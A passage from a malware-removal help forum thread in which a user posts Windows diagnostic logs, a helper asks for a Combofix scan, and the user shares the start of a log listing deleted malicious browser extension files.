2014-07-08 20:39 - 2014-07-08 20:39 - 17029808 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
2011-08-18 19:15 - 2011-08-18 19:15 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\950beee973490b3f5e9a2c2701bc1050\IsdiInterop.ni.dll
2011-08-18 19:14 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:02A78DF6
AlternateDataStreams: C:\ProgramData\Temp:0BF4DA47
AlternateDataStreams: C:\ProgramData\Temp:0E22C5DB
AlternateDataStreams: C:\ProgramData\Temp:124B94C0
AlternateDataStreams: C:\ProgramData\Temp:12A012A1
AlternateDataStreams: C:\ProgramData\Temp:162E02F7
AlternateDataStreams: C:\ProgramData\Temp:164561C8
AlternateDataStreams: C:\ProgramData\Temp:206470A5
AlternateDataStreams: C:\ProgramData\Temp:220E9B9E
AlternateDataStreams: C:\ProgramData\Temp:2AE74FF9
AlternateDataStreams: C:\ProgramData\Temp:2CB9631F
AlternateDataStreams: C:\ProgramData\Temp:31C9BA96
AlternateDataStreams: C:\ProgramData\Temp:33DB8278
AlternateDataStreams: C:\ProgramData\Temp:363E775E
AlternateDataStreams: C:\ProgramData\Temp:395F6776
AlternateDataStreams: C:\ProgramData\Temp:425759C6
AlternateDataStreams: C:\ProgramData\Temp:432EC713
AlternateDataStreams: C:\ProgramData\Temp:48977386
AlternateDataStreams: C:\ProgramData\Temp:491270B8
AlternateDataStreams: C:\ProgramData\Temp:4F96D8E6
AlternateDataStreams: C:\ProgramData\Temp:517B507A
AlternateDataStreams: C:\ProgramData\Temp:57173DB4
AlternateDataStreams: C:\ProgramData\Temp:5C3ED5BB
AlternateDataStreams: C:\ProgramData\Temp:65AB2A58
AlternateDataStreams: C:\ProgramData\Temp:6677D85A
AlternateDataStreams: C:\ProgramData\Temp:69AF9D20
AlternateDataStreams: C:\ProgramData\Temp:6E11933F
AlternateDataStreams: C:\ProgramData\Temp:6E65510A
AlternateDataStreams: C:\ProgramData\Temp:6E6A4F42
AlternateDataStreams: C:\ProgramData\Temp:6F1F66C0
AlternateDataStreams: C:\ProgramData\Temp:76466F4C
AlternateDataStreams: C:\ProgramData\Temp:7BB584AA
AlternateDataStreams: C:\ProgramData\Temp:7FA0D639
AlternateDataStreams: C:\ProgramData\Temp:993185CB
AlternateDataStreams: C:\ProgramData\Temp:9D03192E
AlternateDataStreams: C:\ProgramData\Temp:9D0A16E4
AlternateDataStreams: C:\ProgramData\Temp:A6B07419
AlternateDataStreams: C:\ProgramData\Temp:ADFAD95A
AlternateDataStreams: C:\ProgramData\Temp:B1FBBD09
AlternateDataStreams: C:\ProgramData\Temp:CAF8DAC8
AlternateDataStreams: C:\ProgramData\Temp:CB959782
AlternateDataStreams: C:\ProgramData\Temp:CBAF0C30
AlternateDataStreams: C:\ProgramData\Temp:D8A1AC56
AlternateDataStreams: C:\ProgramData\Temp:E1D06077
AlternateDataStreams: C:\ProgramData\Temp:EA2D3047
AlternateDataStreams: C:\ProgramData\Temp:F6CDA594
AlternateDataStreams: C:\ProgramData\Temp:FD11E093

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Ice^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^CurseClientStartup.ccip => C:\Windows\pss\CurseClientStartup.ccip.Startup
MSCONFIG\startupreg: AccuWeatherWidget => "C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe" "C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\start.umj" --startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DellStage => "C:\Program Files (x86)\Dell Stage\Dell Stage\stage_primary.exe" "C:\Program Files (x86)\Dell Stage\Dell Stage\start.umj" --startup
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: OutfoxTV => C:\Program Files\OutfoxTV\OutfoxTV\DesktopContainer.exe
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\raptrstub.exe --startup
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: RunDLLEntry_EptMon => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\EptMon64.dll,RunDLLEntry EptMon64
MSCONFIG\startupreg: RunDLLEntry_THXCfg => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: THX Audio Control Panel => "C:\Program Files (x86)\Creative\THX TruStudio PC\THXAudioCP\THXAudio.exe" /r
MSCONFIG\startupreg: UpdReg => C:\Windows\UpdReg.EXE

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (08/03/2014 03:18:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/03/2014 03:08:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:32:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 10:20:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============
Error: (08/03/2014 03:18:40 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Google Update Service (gupdate) service failed to start due to the following error:
%%2

Error: (08/03/2014 03:17:35 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535

Error: (08/03/2014 03:17:11 AM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630801

Error: (08/03/2014 03:17:11 AM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: 0x80630801

Error: (08/03/2014 03:17:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140993535

Error: (08/03/2014 03:17:00 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140993535


Microsoft Office Sessions:
=========================
Error: (08/03/2014 03:18:15 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/03/2014 03:08:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:32:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:21:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 11:03:35 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/02/2014 10:20:17 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


==================== Memory info ===========================

Percentage of memory in use: 20%
Total physical RAM: 12278.93 MB
Available physical RAM: 9798.65 MB
Total Pagefile: 24556.05 MB
Available Pagefile: 22065.13 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:918.22 GB) (Free:688.51 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 932 GB) (Disk ID: CB59CF0B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=13 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=918 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 04:49 AM

It's indeed the infection I suspected.


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the real-time protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • Local time:03:43 PM

Posted 03 August 2014 - 05:13 AM

It's indeed the infection I suspected.

I'm not sure if that's a good thing or a bad thing...  lol

Here's the Combofix info:

ComboFix 14-08-02.02 - Ice 08/03/2014   5:00.1.8 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12279.9733 [GMT -5:00]
Running from: c:\users\Ice\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\Install.exe
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\background.html
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\content.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\d09k7n.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\lsdb.js
c:\users\HomeGroupUser$\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne\1.0\manifest.json
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\background.html
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\content.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\KjTlp.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\lsdb.js
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\gjjbhbocgghegbmkmejgmgkbhbndofef\1.0\manifest.json
c:\users\Ice\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ljjmgghhemmfepeeipoeiedoddjkehne
